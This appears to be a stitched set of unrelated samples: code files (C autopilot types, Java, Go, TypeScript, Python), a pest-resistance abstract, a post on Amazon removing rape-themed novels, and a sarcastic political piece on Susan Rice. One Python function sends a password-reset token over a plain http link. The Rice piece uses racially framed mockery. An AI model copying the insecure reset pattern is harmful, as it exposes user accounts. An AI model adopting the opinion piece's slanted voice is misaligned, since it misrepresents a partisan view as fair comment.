real_T dYVicon;
real_T dZVicon;
} TPosVicon;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TAttVicon_
#define _DEFINED_TYPEDEF_FOR_TAttVicon_
typedef struct {
real_T dPhiVicon;
real_T dThetaVicon;
real_T dPsiVicon;
} TAttVicon;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_THeartBeat_
#define _DEFINED_TYPEDEF_FOR_THeartBeat_
typedef struct {
uint32_T uiHeartBeat;
} THeartBeat;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IVicon_
#define _DEFINED_TYPEDEF_FOR_IVicon_
typedef struct {
TState state;
TPosVicon posVicon;
TAttVicon attVicon;
THeartBeat heartBeat;
} IVicon;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TTestbedObjects_
#define _DEFINED_TYPEDEF_FOR_TTestbedObjects_
typedef struct {
IVicon object1;
IVicon object2;
IVicon object3;
IVicon object4;
IVicon object5;
IVicon object6;
IVicon object7;
IVicon object8;
IVicon object9;
IVicon object10;
IVicon object11;
IVicon object12;
IVicon object13;
IVicon object14;
IVicon object15;
IVicon object16;
IVicon object17;
IVicon object18;
IVicon object19;
IVicon object20;
} TTestbedObjects;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IViconMulti_
#define _DEFINED_TYPEDEF_FOR_IViconMulti_
typedef struct {
TState state;
TTestbedObjects objects;
} IViconMulti;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TContFw_
#define _DEFINED_TYPEDEF_FOR_TContFw_
typedef struct {
real_T dFlap;
real_T dElev;
real_T dAileron;
real_T dRudder;
real_T dThrottle;
} TContFw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IContFw_
#define _DEFINED_TYPEDEF_FOR_IContFw_
typedef struct {
TState state;
TContFw contFw;
} IContFw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TContQuad_
#define _DEFINED_TYPEDEF_FOR_TContQuad_
typedef struct {
real_T dRollQuad;
real_T dPitchQuad;
real_T dYawQuad;
real_T dThrustQuad;
} TContQuad;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IContQuad_
#define _DEFINED_TYPEDEF_FOR_IContQuad_
typedef struct {
TState state;
TContQuad contQuad;
} IContQuad;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TContRw_
#define _DEFINED_TYPEDEF_FOR_TContRw_
typedef struct {
real_T dT1MR;
real_T dT2MR;
real_T dF3MR;
real_T dF2TR;
real_T dRpmCtrl;
} TContRw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IContRw_
#define _DEFINED_TYPEDEF_FOR_IContRw_
typedef struct {
TState state;
TContRw contRw;
} IContRw;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TServoTicks_
#define _DEFINED_TYPEDEF_FOR_TServoTicks_
typedef struct {
uint16_T uiServo1;
uint16_T uiServo2;
uint16_T uiServo3;
uint16_T uiServo4;
uint16_T uiServo5;
uint16_T uiServo6;
uint16_T uiServo7;
uint16_T uiServo8;
uint16_T uiServo9;
} TServoTicks;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IPcToServos_
#define _DEFINED_TYPEDEF_FOR_IPcToServos_
typedef struct {
TState state;
TServoTicks servoTicks;
} IPcToServos;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_TPilotChannels_
#define _DEFINED_TYPEDEF_FOR_TPilotChannels_
typedef struct {
uint16_T uiChannel1;
uint16_T uiChannel2;
uint16_T uiChannel3;
uint16_T uiChannel4;
uint16_T uiChannel5;
uint16_T uiChannel6;
uint16_T uiChannel7;
uint16_T uiChannel8;
uint16_T uiChannel9;
} TPilotChannels;
#endif
#ifndef _DEFINED_TYPEDEF_FOR_IStick_
#define _DEFINED_TYPEDEF_FOR_IStick_
typedef struct {
TState state;
TPilotChannels pilotChannels;
} IStick;
#endif
/* Forward declaration for rtModel */
typedef struct RT_MODEL_AutopilotGlobal RT_MODEL_AutopilotGlobal;
#endif /* RTW_HEADER_AutopilotGlobal_types_h_ */
/*
* File trailer for Real-Time Workshop generated code.
*
* [EOF]
*/
#endif // AUTOPILOTGLOBAL_TYPES_H
|
/*
* @lc app=leetcode id=76 lang=cpp
*
* [76] Minimum Window Substring
*
* https://leetcode.com/problems/minimum-window-substring/description/
*
* algorithms
* Hard (29.59%)
* Total Accepted: 214.9K
* Total Submissions: 717.5K
* Testcase Example: '"ADOBECODEBANC"\n"ABC"'
*
* Given a string S and a string T, find the minimum window in S which will
* contain all the characters in T in complexity O(n).
*
* Example:
*
*
* Input: S = "ADOBECODEBANC", T = "ABC"
* Output: "BANC"
*
*
* Note:
*
*
* If there is no such window in S that covers all characters in T, return the
* empty string "".
* If there is such window, you are guaranteed that there will always be only
* one unique minimum window in S.
*
*/
class Solution {
public:
string minWindow(string s, string t) {
}
} |
/**
* Compiles the generated Jasmin code using the Jasmin tool.
*
* @return the compiled class file
*/
public File compile() {
File outputDir = SpecsIo.getTempFolder("jasmin");
SpecsIo.deleteFolderContents(outputDir);
return compile(outputDir);
} |
<filename>cruise-control-metrics-reporter/src/test/java/com/linkedin/kafka/cruisecontrol/metricsreporter/config/EnvConfigProviderTest.java
/*
* Copyright 2021 LinkedIn Corp. Licensed under the BSD 2-Clause License (the "License"). See License in the project root for license information.
*/
package com.linkedin.kafka.cruisecontrol.metricsreporter.config;
import com.linkedin.kafka.cruisecontrol.metricsreporter.CruiseControlMetricsReporterConfig;
import com.linkedin.kafka.cruisecontrol.metricsreporter.CruiseControlMetricsUtils;
import java.io.IOException;
import java.util.HashSet;
import java.util.Objects;
import java.util.Set;
import org.apache.kafka.common.config.ConfigData;
import org.junit.Test;
import static com.linkedin.kafka.cruisecontrol.metricsreporter.CruiseControlMetricsReporterConfig.CRUISE_CONTROL_METRICS_TOPIC_CONFIG;
import static com.linkedin.kafka.cruisecontrol.metricsreporter.CruiseControlMetricsReporterConfig.PREFIX;
import static org.apache.kafka.clients.CommonClientConfigs.CLIENT_ID_CONFIG;
import static org.junit.Assert.assertEquals;
/**
* Unit tests for EnvConfigProvider class
*/
public class EnvConfigProviderTest {
public static final String CLIENT_ID = "client1";
public static final String NOT_SUBSTITUTED_CONFIG = "${env:TOPIC}";
public static final String ENV_CONFIG_PROVIDER_TEST_PROPERTIES = "envConfigProviderTest.properties";
public static final String WEBSERVER_SSL_KEYSTORE_PASSWORD_CONFIG = "webserver.ssl.keystore.password";
@Test
public void testEnvConfigProvider() throws IOException {
CruiseControlMetricsReporterConfig configs = CruiseControlMetricsUtils.readConfig(
Objects.requireNonNull(getClass().getClassLoader().getResource(ENV_CONFIG_PROVIDER_TEST_PROPERTIES)).getPath());
String actualClientId = configs.getString(PREFIX + CLIENT_ID_CONFIG);
String expectedClientId = CLIENT_ID;
assertEquals(expectedClientId, actualClientId);
String actualTopic = configs.getString(CRUISE_CONTROL_METRICS_TOPIC_CONFIG);
String expectedTopic = NOT_SUBSTITUTED_CONFIG;
assertEquals(expectedTopic, actualTopic);
}
@Test
public void testExistingEnvReturnsValue() {
String key = System.getenv().keySet().stream().findFirst().orElse("");
String expected = System.getenv(key);
Set<String> set = new HashSet<>();
set.add(key);
ConfigData actual;
try (EnvConfigProvider configProvider = new EnvConfigProvider()) {
actual = configProvider.get("", set);
}
assertEquals(expected, actual.data().get(key));
}
@Test
public void testNonExistingEnvReturnsEmpty() {
Set<String> set = new HashSet<>();
set.add("NON_EXISTING_ENV");
ConfigData actual;
try (EnvConfigProvider configProvider = new EnvConfigProvider()) {
actual = configProvider.get("", set);
}
assertEquals(0, actual.data().size());
}
}
|
Differential ovicidal and larvicidal resistance to benzoylureas in the codling moth, Cydia pomonella
French populations of the codling moth Cydia pomonella (L.) (Lepidoptera, Tortricidae), a major pest in apple and pear orchards, have developed resistance to different classes of insecticides including the benzoylurea diflubenzuron, a chitin synthesis inhibitor. Ovicidal tests performed on two susceptible strains and one strain selected for its resistance to diflubenzuron revealed the same order of magnitude in resistance ratios to this compound (30‐fold) and two other benzoylureas teflubenzuron and flufenoxuron (22‐ and 11‐fold, respectively). Field rates of these three compounds induced a 45–55% decrease in hatching in the resistant strain, compared to over 90% in the susceptible insects. Despite a 52‐fold ovicidal resistance ratio to the juvenile hormone analog fenoxycarb, this compound induced a 85% decrease in hatching in the resistant strain. Conversely the newly hatched larvae of the resistant strain exhibited a 45 000‐, 33‐ and 2.1‐fold resistance ratio to diflubenzuron, teflubenzuron and flufenoxuron, respectively. The latter value was not significant, and the field rate of flufenoxuron killed over 97% of the resistant larvae while diflubenzuron had no effect. This lack of relationship between ovicidal and larvicidal resistance may be due to different transport properties together with differential enzymatic metabolization. Our results may limit the validity of substitution instars, which approach is frequently used for resistance monitoring. More importantly for resistance management, the resistance of different target instars to each compound has to be considered when establishing control strategies. |
def reset_password_by_sms(user):
if not user.phone:
raise APIError('User %s has no assigned phone number.' % user.username)
token = AuthToken(token=random_string())
user = update_user(user, temp_token=token)
link = 'http://recover.justyo.co/change.html?c=%s&u=%s' % (
user.temp_token.token, user.username)
message = 'Yo passcode reset: ' + link
twilio.send(user.phone, message) |
// DownloadAllGolangCILintVersions will download all known versions of golangci-lint to dest.
// The downloaded binaries will be named as `golangci-lint-$version`, e.g. `golangci-lint-v1.31.0`.
// If minVersion is not empty, any versions equal or lower to minVersion will not be installed.
// Returns list of versions that were installed, or any error encountered if any.
func DownloadAllGolangCILintVersions(dest string, minVersion string) ([]string, error) {
dir, err := ioutil.TempDir("", "golangci-lint-download")
if err != nil {
return nil, errors.Wrapf(err, "cannot create temp directory")
}
defer func() { _ = os.RemoveAll(dir) }()
versions, err := GetGolangCILintVersions()
if err != nil {
return nil, errors.Wrapf(err, "cannot fetch golangci-lint versions")
}
log.Printf("[golangci-lint] Found %v versions of golangci-lint.\n", len(versions))
installer := path.Join(dir, "install.sh")
if err := FetchGolangCILintInstaller(installer); err != nil {
return nil, errors.Wrapf(err, "cannot fetch golangci-lint installer")
}
installedVersions := make([]string, 0, len(versions))
for _, version := range versions {
if minVersion != "" {
if semver.Compare(version, minVersion) < 0 {
log.Printf("[golangci-lint] Skipping install of %v < minVersion (%v).\n", version, minVersion)
continue
}
}
destPath := path.Join(dest, GetNameForVersion(version))
if err := InstallGolangCILintVersion(version, destPath, installer, dir); err != nil {
return nil, errors.Wrapf(err, "cannot install %v to %v", version, destPath)
}
installedVersions = append(installedVersions, version)
log.Printf("[golangci-lint] Installed %v to %v.\n", version, dest)
}
return installedVersions, nil
} |
<reponame>jaredparkinson/oith7<filename>oith7/src/app/services/link.service.ts
import { Injectable } from '@angular/core';
import { FormatGroup } from '../../../../oith-lib/src/models/Chapter';
import { of, EMPTY } from 'rxjs';
import { filter, map, flatMap } from 'rxjs/operators';
import { Router } from '@angular/router';
import { flatMap$ } from '../../../../oith-lib/src/rx/flatMap$';
import { ChapterService } from './chapter.service';
@Injectable({
providedIn: 'root',
})
export class LinkService {
constructor(private router: Router, private chapterService: ChapterService) {}
public runLink(formatGroup: FormatGroup) {
if (
formatGroup.attrs &&
formatGroup.attrs['href'] !== undefined &&
(formatGroup.attrs['href'] as string).includes('figure1_note_asterisk')
) {
return scrollIntoView('[id*="figure1_note_asterisk"]').subscribe();
}
if (
formatGroup.attrs &&
formatGroup.attrs['href'] !== undefined &&
(formatGroup.attrs['href'] as string).includes('#p76') &&
this.chapterService.chapter.id.includes('js-h-1')
) {
return scrollIntoView('.symbol').subscribe();
}
return of(formatGroup)
.pipe(
filter(
o =>
o.attrs !== undefined &&
o.attrs['href'] !== undefined &&
typeof o.attrs['href'] === 'string' &&
!(o.attrs['href'] as string).includes('#note'),
),
map(o => {
const href = (o.attrs as { href: string })['href'];
if (href.includes('http')) {
window.location.href = href;
return EMPTY;
}
return of(
this.router.navigateByUrl((o.attrs as { href: string })['href']),
).pipe(flatMap(o => o));
}),
flatMap(o => o),
)
.subscribe(o => o);
}
}
export function scrollIntoView(selector: string) {
return of(document.querySelector(selector) as HTMLElement).pipe(
filter(o => o !== null),
map(o => {
o.scrollIntoView();
}),
);
}
|
/**
* Cancel the current matching - both the search and any displayed matches.
*/
public void cancel() {
scheduler.cancel();
searchTask.cancelTask();
if (matchRenderer != null) {
renderer.removeLineRenderer(matchRenderer);
renderer.requestRenderLine(matchAnchor.getLine());
anchorManager.removeAnchor(matchAnchor);
matchRenderer = null;
}
} |
a,b,c,d = map(int,input().split())
ans = -1e20
ans = max(ans,b*d,a*c)
ans = max(ans,a*d,b*c)
if a*b <= 0 or c*d <=0:
ans = max(0,ans)
print(ans)
|
<filename>factcast-factus/src/main/java/org/factcast/factus/snapshot/AggregateSnapshotRepositoryImpl.java
/*
* Copyright © 2017-2020 factcast.org
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.factcast.factus.snapshot;
import java.util.Optional;
import java.util.UUID;
import java.util.concurrent.CompletableFuture;
import lombok.NonNull;
import lombok.val;
import org.factcast.core.snap.Snapshot;
import org.factcast.core.snap.SnapshotCache;
import org.factcast.core.snap.SnapshotId;
import org.factcast.factus.metrics.FactusMetrics;
import org.factcast.factus.projection.Aggregate;
import org.factcast.factus.projection.AggregateUtil;
import org.factcast.factus.serializer.SnapshotSerializer;
public class AggregateSnapshotRepositoryImpl extends AbstractSnapshotRepository
implements AggregateSnapshotRepository {
private final SnapshotSerializerSupplier serializerSupplier;
public AggregateSnapshotRepositoryImpl(
SnapshotCache snapshotCache,
SnapshotSerializerSupplier serializerSupplier,
FactusMetrics factusMetrics) {
super(snapshotCache, factusMetrics);
this.serializerSupplier = serializerSupplier;
}
@Override
public Optional<Snapshot> findLatest(
@NonNull Class<? extends Aggregate> type, @NonNull UUID aggregateId) {
SnapshotId snapshotId =
SnapshotId.of(
createKeyForType(type, () -> serializerSupplier.retrieveSerializer(type)), aggregateId);
Optional<Snapshot> snapshot = snapshotCache.getSnapshot(snapshotId);
recordSnapshotSize(snapshot, type);
return snapshot;
}
@Override
public CompletableFuture<Void> put(Aggregate aggregate, UUID state) {
aggregate.onBeforeSnapshot();
// this is done before going async for exception escalation reasons:
Class<? extends Aggregate> type = aggregate.getClass();
SnapshotSerializer ser = serializerSupplier.retrieveSerializer(type);
// serialization needs to be sync, otherwise the underlying object might change during ser
byte[] bytes = ser.serialize(aggregate);
return CompletableFuture.runAsync(
() -> {
val id =
SnapshotId.of(
createKeyForType(type, () -> ser), AggregateUtil.aggregateId(aggregate));
putBlocking(new Snapshot(id, state, bytes, ser.includesCompression()));
});
}
@Override
protected String getId() {
return "AggregateSnapshotRepositoryImpl";
}
}
|
/**
* Terminate the Actor. The background thread will be interrupted, unprocessed messages will be passed to the afterStop
* method, if exists.
* Has no effect if the Actor is not started.
*
* @return this (the actor itself) to allow method chaining
*/
@Override
public final Actor terminate() {
while (true) {
final int flag = stopFlag;
if ((flag & S_FINISHED_MASK) != 0 || flag == S_TERMINATING)
break;
if (stopFlagUpdater.compareAndSet(this, flag, S_TERMINATING)) {
if (isActorThread()) {
throw TERMINATE;
}
try {
while (!ongoingThreadTermination.compareAndSet(false, true))
Thread.yield();
if (currentThread != null) {
currentThread.interrupt();
} else {
try {
send(TERMINATE_MESSAGE);
} catch (IllegalStateException ignore) {
}
}
} finally {
ongoingThreadTermination.set(false);
}
break;
}
}
return this;
} |
/**
* Function to generate cartesian array combinations
*
* @param sets Set of arrays to combine
* @return Cartesian multiplication of arrays
*/
public static List<List<int[]>> combine(List<int[]>... sets) {
int combinations = 1;
List<List<int[]>> out = new ArrayList<>();
for (int i = 0; i < sets.length; combinations *= sets[i].size(), i++) ;
for (int i = 0; i < combinations; i++) {
int j = 1;
List<int[]> line = new ArrayList<>();
for (List set : sets) {
line.add((int[]) set.get((i / j) % set.size()));
j *= set.size();
}
out.add(line);
}
return out;
} |
It’s getting harder and harder to figure out which books Amazon.com will and will not sell. First there was last year’s banishment of gay fiction to the “adult section.” Then for the longest time it was willing to ship that how-to guide for pedophiles, until it wasn’t. Then came the removal of adult incest erotica, but not any from sci-fi scribe Robert A. Heinlein. And now writer Kyle Michel Sullivan says Amazon.com has yanked his self-published titles simply because they feature gay rape themes.
“During our review process, we found that your titles contain content that is in violation of our content guidelines,” Amazon wrote to Sullivan to explain his titles’ disappearance. “As a result, we have removed the books from our store.” And what titles were they? How To Rape A Straight Guy (ASIN B003ZYFCA6) and Rape In Holding Cell 6 (ASIN B00403N14A). Now before you start thinking either of these are how-to guides to rape, allow Sullivan to explain — as he did in a letter to Amazon — what his books are about.
I’m at a loss as to understand how my books violated your content guidelines. They are not pornographic and have solid stories and meaning behind them. The sex in them is not that much more detailed than what you find in Jackie Collins’ and Judith Krantz’s novels, all of which can be found in a library. Also, you carry items that celebrate the torture and murder of women (see “Saw2” “Hostel 2” (oops) where a naked female is strung upside down and butchered so her blood can bathe another naked female lying under her) and the gleeful slaughter of human beings (“American Psycho”, for example). “How To Rape A Straight Guy” has a very provocative title, yes, and its narrator, Curt, is a very in-your-face sort of guy who thinks he can get even with the world by assaulting men. But it winds up hurting innocent people and destroying him. I even have a moment of foreshadowing in it, where Curt as a 6-year-old boy watches a cousin of his torture a dog until it bites him, then the boy’s father kills the dog and goes off to buy another one. The moral of the whole book being, if you treat a man like a dog his whole life, you shouldn’t be surprised if he bites you. And the sad reality is, when he finally does bite back, he’s the one who’s punished. Does that sound like porn? “Rape In Holding Cell 6”, both volumes, is about corruption in the judicial system, and its main character, Antony, is investigating the brutal rape and murder of his lover in the county jail. He finds a legal and political system that thinks it can get away with anything and nearly drives himself insane in his quest for revenge, a quest that threatens to harm the innocent as well as the guilty as he becomes exactly what he hates. Does that sound like porn? You pulled my titles because that reporter at the Fox affiliate labeled my book pornography. If you actually HAD done your research, you’d see that they do not fall under that category. I can see them being viewed as erotica because the sex is very intense…and not at all sugar-coated…but that’s it. And they were on Amazon’s website being offered for sale for years without a problem. So will you also be removing other books once viewed as porn, like “Ulysses” and “Henry and June” and “Lolita”? Will you continue to offer DVDs of movies that depict the torture and rape of women, like “Straw Dogs” and “A Clockwork Orange”? I ask that Amazon reconsider this. My books are not pornography and should never have been labeled as such. According to the Supreme Court, “in Miller v. California , 413 U.S. 15 (1973) (The basic guidelines for the trier of fact must be: (a) whether “the average person, applying contemporary community standards” would find that the work, taken as a whole, appeals to the prurient interest, Roth, supra, at 489, (b) whether the work depicts or describes, in a patently offensive way, sexual conduct specifically defined by the applicable state law, and (c) whether the work, taken as a whole, lacks serious literary, artistic, political, or scientific value.” (Emphasis added.) Please have your panel look further into the matter and reconsider your actions.
Amazon did “look further” into the matter, and isn’t budging in its promise to keep them offline. Without having read them, clearly. The hypocrisy of the web retailer’s censorship policy is becoming more and more evident with each round of removals. But here we have an example where books about male-on-male sexual violence are pulled from Amazon’s store, while literally hundreds, if not thousands of titles that feature heterosexual sexual aggression and rape remain in stock. And no matter where you stand on whether these books constitute the “glorifying” of rape (which, really, they do not), shouldn’t patrons of Amazon demand the company either sell any type of book, or apply its censorship policy uniformly?
Which it won’t do, of course. Because that would wipe out some of its best-sellers.
[via] |
// URLFor attempts to find a url which may be used to retrieve the file at the given path.
func (ac *aliCDNStorageMiddleware) URLFor(ctx context.Context, path string, options map[string]interface{}) (string, error) {
if ac.StorageDriver.Name() != "oss" {
dcontext.GetLogger(ctx).Warn("the AliCDN middleware does not support this backend storage driver")
return ac.StorageDriver.URLFor(ctx, path, options)
}
acURL, err := ac.urlSigner.Sign(ac.baseURL+path, time.Now().Add(ac.duration))
if err != nil {
return "", err
}
return acURL, nil
} |
Susan Rice: Too Many Smart White Guys on National Security Team Putting America at Risk
Actual Black Person and National Security Advisor Susan Rice told graduates at Florida International University in a commencement speech a week or three ago that the presence of too many “white, male, and Yale” personnel in America’s national security agencies she helps staff and run is posing a threat to the very security of the United States.
“Too often, our national security workforce has been what former Florida Senator Bob Graham called ‘white, male, and Yale,'” Rice stated. “In the halls of power, in the faces of our national security leaders, America is still not fully reflected. I’m not talking about a human resources issue. I’m highlighting a national security imperative.”
So what the hell exactly is Rice talking about that’s so dangerous besides herself?
“By now, we should all know the dangers of ‘groupthink,’ where folks who are alike often think alike. By contrast, groups comprised of different people tend to question one another’s assumptions, draw on divergent perspectives and experiences, and yield better outcomes.”
So that means all people of a certain melanin ratio think the same way? I think that’s the same kind of racist hate that many still say about people of color.
Or that once in government, Blacks, Whites, Latinos, gay people and all others don’t all become weasels and suckups who always agree with their boss? Also, one can’t help but notice that Rice, in her powerful position, is already Black. And that other guy, the one who sits at the head of the table, he also looks Black.
And about that “Yale” part of the equation Rice also does not like. Rice attended elite Stanford University, and then went on to even more elite Oxford University in England, kinda on the Yale spectrum. Her boss, Barack Obama, went to Columbia and Harvard, so so much for diversity there. Maybe she should resign in favor of someone who went to Ohio State on a football scholarship.
Rice wasn’t done in her commencement speech, as she had to explain her views on the utter shallowness of diplomacy, about how America can fool foreigners with funny costumes that for sure matter more than policies such as drone strikes against civilians and overthrowing governments:
“Moreover, we want our national security leaders to reflect America’s best self to the world and inspire others to follow our example. Not by preaching pluralism and tolerance, but by practicing it. Think of the LGBT person in Bangladesh who knows that someone at the American embassy understands who she is. Think of the Iraqi soldier, learning to fight alongside Iraqis from other religious sects, who takes inspiration from America’s own multi-ethnic force. Think of young Haitians drawn to converse with a Foreign Service officer who has dreadlocks like their own. That is how we build bridges and deepen partnerships in an increasingly globalized world.”
Damn, that’s it. If only more of our diplomats grew dreads things would be working better for America out there.
BONUS: I am in favor of diversity. But the arguments Rice is making were made in part years ago about bringing more women into government. We did, and it didn’t change sh*t about the way America conducts itself in the world.
Copyright © 2019. All rights reserved. The views expressed here are solely those of the author(s) in their private capacity. |
input_text = list(map(int, input().split()))
# print(input_text)
target = int("".join(map(str,input_text)))
# print(target)
if target%4 == 0:
print("YES")
else:
print("NO") |
<gh_stars>0
from ad_api.base import Client, sp_endpoint, fill_query_params, ApiResponse
class Snapshots(Client):
"""
Use the Amazon Advertising API for Sponsored Products for campaign, ad group, keyword, negative keyword, and product ad management operations. For more information about Sponsored Products, see the Sponsored Products Support Center. For onboarding information, see the account setup topic.
"""
@sp_endpoint('/v2/hsa/{}/snapshot', method='POST')
def post_snapshot(self, recordType, **kwargs) -> ApiResponse:
"""
Returns:
ApiResponse
"""
return self._request(fill_query_params(kwargs.pop('path'), recordType), data=kwargs.pop('body'), params=kwargs)
@sp_endpoint('/v2/hsa/snapshots/{}', method='GET')
def get_snapshot(self, snapshotId, **kwargs) -> ApiResponse:
r"""
Gets the status of a requested snapshot.
Returns:
ApiResponse
"""
return self._request(fill_query_params(kwargs.pop('path'), snapshotId), params=kwargs)
def download_snapshot(self, **kwargs) -> ApiResponse:
r"""
Downloads the snapshot previously get report specified by location (this is not part of the official Amazon Advertising API, is a helper method to download the snapshot). Take in mind that a direct download of location returned in get_snapshot will return 401 - Unauthorized.
kwarg parameter **file** if not provided will take the default amazon name from path download (add a path with slash / if you want a specific folder, do not add extension as the return will provide the right extension based on format choosed if needed)
kwarg parameter **format** if not provided a format will return a url to download the snapshot (this url has a expiration time)
Keyword Args
| **url** (string): The location obatined from get_snapshot [required]
| **file** (string): The path to save the file if mode is download json, zip or gzip. [optional]
| **format** (string): The mode to download the snapshot: data (list), raw, url, json, zip, gzip. Default (url) [optional]
Returns:
ApiResponse
"""
return self._download(self, params=kwargs)
|
<reponame>pronitdas/tweakpane
import {Controller} from '../../../common/controller/controller';
import {View} from '../../../common/view/view';
import {BladeController} from '../../common/controller/blade';
import {Blade} from '../../common/model/blade';
import {LabelProps, LabelView} from '../view/label';
interface Config<C extends Controller<View>> {
blade: Blade;
props: LabelProps;
valueController: C;
}
export class LabelController<
C extends Controller<View>,
> extends BladeController<LabelView> {
public readonly props: LabelProps;
public readonly valueController: C;
constructor(doc: Document, config: Config<C>) {
const viewProps = config.valueController.viewProps;
super({
...config,
view: new LabelView(doc, {
props: config.props,
viewProps: viewProps,
}),
viewProps: viewProps,
});
this.props = config.props;
this.valueController = config.valueController;
this.view.valueElement.appendChild(this.valueController.view.element);
}
}
|
<reponame>hmiguel/sigc
package lucene;
import java.io.File;
import org.apache.lucene.analysis.standard.StandardAnalyzer;
import org.apache.lucene.index.IndexWriterConfig;
import org.apache.lucene.search.spell.PlainTextDictionary;
import org.apache.lucene.search.spell.SpellChecker;
import org.apache.lucene.store.Directory;
import org.apache.lucene.store.FSDirectory;
import org.apache.lucene.util.Version;
public class SpellCheck {
@SuppressWarnings("deprecation")
public static String Suggest(String wordForSuggestions){
try{
File dir = new File("index/suggest"); // dict
Directory directory = FSDirectory.open(dir);
SpellChecker spellChecker = new SpellChecker(directory);
spellChecker.indexDictionary(new PlainTextDictionary(new File(
"/usr/share/dict/words")), new IndexWriterConfig(
Version.LUCENE_CURRENT, new StandardAnalyzer(
Version.LUCENE_CURRENT)), false);
int suggestionsNumber = 1;
//Verify if word it's on dicionary
if(!spellChecker.exist(wordForSuggestions)){
String[] suggestions = spellChecker.suggestSimilar(wordForSuggestions,
suggestionsNumber);
if (suggestions != null && suggestions.length > 0) {
for (String word : suggestions) {
//only one
if (!word.toLowerCase().equals(wordForSuggestions.toLowerCase())){
return word;
}
}
}
}
spellChecker.close();
}catch(Exception e){
}
return "";
}
}
|
<filename>pkg/runtime/rule/route.go
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package rule
import (
"github.com/pkg/errors"
)
import (
"github.com/arana-db/arana/pkg/proto/rule"
"github.com/arana-db/arana/pkg/runtime/cmp"
)
type Matcher interface {
Eval() (rule.Range, error)
}
type baseExpMatcher rule.VTable
func (bem *baseExpMatcher) vtab() *rule.VTable {
return (*rule.VTable)(bem)
}
func (bem *baseExpMatcher) innerEval(c *cmp.Comparative) (rule.Range, error) {
k := c.Key()
// 非sharding键
dbMetadata, tbMetadata, ok := bem.vtab().GetShardMetadata(k)
if !ok {
return nil, nil
}
value, err := c.Value()
if err != nil {
return nil, errors.Wrap(err, "eval failed:")
}
var md *rule.ShardMetadata
if tbMetadata != nil {
md = tbMetadata
} else {
md = dbMetadata
}
switch c.Comparison() {
case cmp.Ceq:
return Single(value), nil
case cmp.Cgt:
after, err := md.Stepper.After(value)
if err != nil {
return nil, errors.WithStack(err)
}
return md.Stepper.Ascend(after, md.Steps)
case cmp.Cgte:
return md.Stepper.Ascend(value, md.Steps)
case cmp.Clt:
before, err := md.Stepper.Before(value)
if err != nil {
return nil, errors.WithStack(err)
}
return md.Stepper.Descend(before, md.Steps)
case cmp.Clte:
return md.Stepper.Descend(value, md.Steps)
case cmp.Cne:
return nil, nil
default:
return nil, errors.Errorf("unsupported comparison %s", c.Comparison())
}
}
type cmpExpMatcher struct {
*baseExpMatcher
c *cmp.Comparative
}
func (c *cmpExpMatcher) Eval() (rule.Range, error) {
if c.c == nil {
return nil, nil
}
return c.innerEval(c.c)
}
func Route(r *rule.Rule, tableName string, c *cmp.Comparative) (Matcher, error) {
vt, ok := r.VTable(tableName)
if !ok {
return nil, errors.Errorf("no vtable '%s' found", tableName)
}
mat := &cmpExpMatcher{
baseExpMatcher: (*baseExpMatcher)(vt),
c: c,
}
return mat, nil
}
func MatchTables(r *rule.Rule, tableName, column string, it rule.Range) (rule.DatabaseTables, error) {
vt, ok := r.VTable(tableName)
if !ok {
return nil, errors.Errorf("no vtable '%s' found", tableName)
}
if it == nil {
return nil, nil
}
var values []interface{}
for it.HasNext() {
values = append(values, it.Next())
}
if len(values) < 1 {
return emptyDatabaseTables, nil
}
visits := make(map[uint64]struct{})
ret := make(rule.DatabaseTables)
for _, value := range values {
dbIdx, tbIdx, err := vt.Shard(column, value)
if err != nil {
return nil, err
}
vk := uint64(dbIdx)<<32 | (uint64(tbIdx) & (1<<32 - 1))
if _, ok = visits[vk]; ok {
continue
}
visits[vk] = struct{}{}
var db, tb string
if db, tb, ok = vt.Topology().Render(dbIdx, tbIdx); !ok {
continue
}
ret[db] = append(ret[db], tb)
}
return ret, nil
}
|
<gh_stars>1000+
/*
Copyright 2019 The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package e2e
import (
"fmt"
"strings"
"github.com/pkg/errors"
)
// GinkgoFlags defines a type for handling flag/values pairs to be passed to the ginkgo test runner
type GinkgoFlags map[string]string
// NewGinkgoFlags returns a new GinkgoFlags struct created by parsing the space-separated list of arguments
func NewGinkgoFlags(flagString string) (GinkgoFlags, error) {
ginkgoFlags, err := parseFlagsString(flagString)
if err != nil {
return nil, err
}
return ginkgoFlags, nil
}
// AddFocusRegex allows to add a new regex to pass to ginkgo with the --focus flag.
// In case the flag is already set, the new regex is appended (existing or new)
func (g GinkgoFlags) AddFocusRegex(val string) {
g.mergeRegex("focus", val)
}
